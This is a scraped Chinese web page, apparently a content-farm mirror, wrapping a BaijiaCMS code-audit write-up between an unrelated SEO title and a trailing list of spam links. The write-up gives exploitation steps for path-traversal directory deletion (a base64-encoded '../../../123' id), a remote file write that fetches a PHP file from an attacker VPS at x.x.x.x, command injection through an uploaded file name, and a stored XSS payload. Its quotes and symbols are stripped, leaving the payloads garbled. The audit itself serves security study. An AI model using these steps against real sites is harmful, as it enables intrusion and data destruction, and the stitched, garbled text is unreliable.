当前位置: 首页 > news >正文

肇庆企业做网站国际域名注册商

肇庆企业做网站,国际域名注册商,企业seo年度,劳务分包网参考博客#xff1a; PHP代码审计之旅之百家CMS-腾讯云开发者社区-腾讯云 环境搭建 源码链接如下所示 https://gitee.com/openbaijia/baijiacms 安装至本地后 直接解压到phpstudy的www目录下即可 接下来去创建一个数据库用于存储CMS信息。#xff08;在Mysql命令行中执行…参考博客 PHP代码审计之旅之百家CMS-腾讯云开发者社区-腾讯云 环境搭建 源码链接如下所示 https://gitee.com/openbaijia/baijiacms 安装至本地后 直接解压到phpstudy的www目录下即可 接下来去创建一个数据库用于存储CMS信息。在Mysql命令行中执行 接下来访问CMS会默认跳转至安装界面 数据库名称和账密注意一下就好其他随便写 审计 准备工作 对具体文件夹进行一次分析这样才能对CMS有一个初步的印象为后续审计做一些铺垫。 根目录如下所示 其对应目录解释如下 addons 插件 api 接口 assets 静态文件 attachment 上传目录 cache 缓存目录 config 系统文件 include 系统文件 system 后端代码 针对system目录这个较为常用我们可以对其进行进一步分析 system 系统模块目录├─alipay 支付宝服务窗模块├─bonus 优惠券模块├─common 公共函数模板├─index 登录页├─member 会员模块├─modules 可再扩展模块和模块管理├─public 公共模块├─shop 后台商城模块├─shopwap 前台商城模块├─user 系统用户└─weixin 微信模块 对这些有过了解后还需要看的就是一些后端支撑文件例如这种xxxinc.php文件他们常常存在一些漏洞进而导致CMS出现漏洞 路由解析 对一个CMS进行漏洞探测前我们需要首先需要对CMS的路由有所了解。 这里我们直接访问默认页面baijiacms-master/index.php然后登录后台这里说一下找路由还可以的方法就是关注一些特别点好找一些比如这里的修改密码界面 我们点击它发现此时的路由如下 /baijiacms-master/index.php?modsiteactmanagerdochangepwdbeid1 可以发现act其实是system文件夹下的文件夹名称do是所选择具体文件的名称,对这些有个初步的了解待会找到文件时能在网页中访问即可。 漏洞查找 任意目录删除 源码分析 漏洞点位于includes/baijiacms/common.inc.php 首先关注的是unlink函数他会删除文件只要$path不是目录就会进入改分支。 但如果你是目录呢会对目录中非.、..、qrcode的文件内循环一次就是会删除文件 循环了一次退出来还会判断改目录是否是/cache目录不是的话直接删除目录。 综上因为$path来自于参数会发现有可能可以实现 “任意” 文件的删除也包括删除目录 全局搜索位于system/manager/class/web/database.php的一处调用了rmdirs函数且发现$_GP[id]可控也就是整个参数路径可控但只有通过is_dir()才可以调用因此可以实现任意目录的删除了。 此外这段代码可以猜出是数据文件的备份删除功能 可以发现这里对变量进行了base64_decode处理这下我们想删除的目录的话我们首先需要对他进行一个base64编码同时我们可以看到这里指定了路径 $path WEB_ROOT . /config/data_backup/; 但这个我们其实是可以绕过的后续只校验了是不是目录而未限定目录所以我们通过burpsuite抓包修改目录就可以实现任意目录删除。 $_GP是三个数组的整合故$_GP[id]也能通过GET、POST请求得到 实操 进入备份与还原模块点击备份商城数据 然后进入数据还原模块 点击删除 数据备份使用burp抓包 发现url中的id参数为删除的数据库备份文件名称既然这是文件就试试能不能删除其他文件。 在WWW目录下创建一个123目录目录重要的事情说两遍然后将../../../123路径base64加密为Li4vLi4vLi4vMTIz  然后使用burp发包删除。 远程文件上传 源码分析 该漏洞由于调用file_put_contents函数但未对文件名或文件内容做任何过滤操作而造成的。位于includes/baijiacms/common.inc.php 后缀是通过pathinfo()得到的然后直接将其拼接进$extpath中然后拼接成一个文件名文件后缀则取决于url的文件后缀 文件内容则是直接来自file_get_contents($url) 全局搜索只有一个地方调用了fetch_net_file_upload函数。位于system/public/class/web/file.php。 只需要令dofetch即可且url可通过GET传递那么完全可以通过url指定获取远程文件的内容 实操 首先在VPS上写个php文件执行的命令是echo ?php echo?php phpinfo();?;?1.php 最后只需要构造调用 http://127.0.0.1/baijiacms-master/index.php?modwebdofilempublicopfetchurlhttp://x.x.x.x/1.php 访问即可得到生成文件的信息  再访问即可 命令执行 源码分析 没有对相应的参数进行过滤而直接使用。位于includes/baijiacms/common.inc.php的file_save()中其中有个system函数而$file_full_path来自于该调用该函数的参数那么可以猜想使用命令分隔符即可执行到命令了。 全局搜索发现system/weixin/class/web/setting.php调用了file_save()这个$file[name]来自于一个上传文件的名称。可控 实操 首先在附件中有个开启选项选择此选项否则在file_save()中会执行不下去 在微信号的设置中上传并提交抓包并在文件名中命令注入 存储型XSS 使用安装时使用的管理员账号密码登录系统。 点击店铺管理 --添加店铺 在店铺名称的位置输入测试XSS payloadscriptalert(11);/script 点击提交 再次查看店铺管理发现弹出xss
http://www.w-s-a.com/news/862241/

相关文章:

  • 广州网站开发系统如何建设百度网站
  • 免费建立一个个人网站网站流量图怎么做
  • 微信网站建设公司首选网站后台更新 前台不显示
  • 撰写网站专题活动策划方案未成年做网站
  • 免费在线响应式网站自助建站网页设计与网站建设试卷
  • 四川省肿瘤医院搜索优化整站优化
  • 新钥匙建站深圳创业补贴政策2023
  • 建网站需要准备什么网站三个月没排名
  • 网站运营规划网站推广的手段
  • cvm可以做网站服务器吗网片围栏
  • 培训前端网站开发网站开发 群
  • 成都武侯区网站建设wordpress菜单分类目录
  • 牡丹江市西安区建设局网站给公司做的东西放到自己网站上
  • 做网站的前景如何郑州seo规则
  • 学校户网站建设方案专业设计服务
  • 电子商务网站建设好么有一个网站怎么做cpc
  • 镇海住房和建设交通局网站跨境电商就是忽悠人的
  • 维修网站怎么做跨境电商发展现状如何
  • 手机网站设计公司皆选亿企邦桐乡市建设局官方网站
  • 企业培训 电子商务网站建设 图片山东省住房和城乡建设厅网站主页
  • 做酒招代理的网站赣icp南昌网站建设
  • 怎样做网站內链大连市建设工程信息网官网
  • 网站软件免费下载安装泰安网站建设收费标准
  • 部署iis网站校园网站设计毕业设计
  • 网站快慢由什么决定塘沽手机网站建设
  • 苏州那家公司做网站比较好装修队做网站
  • 外贸网站推广中山网站流量团队
  • 网站前端设计培训做一份网站的步zou
  • 网站备案拍照茶叶网页设计素材
  • wordpress 手机商城模板关键词优化软件有哪些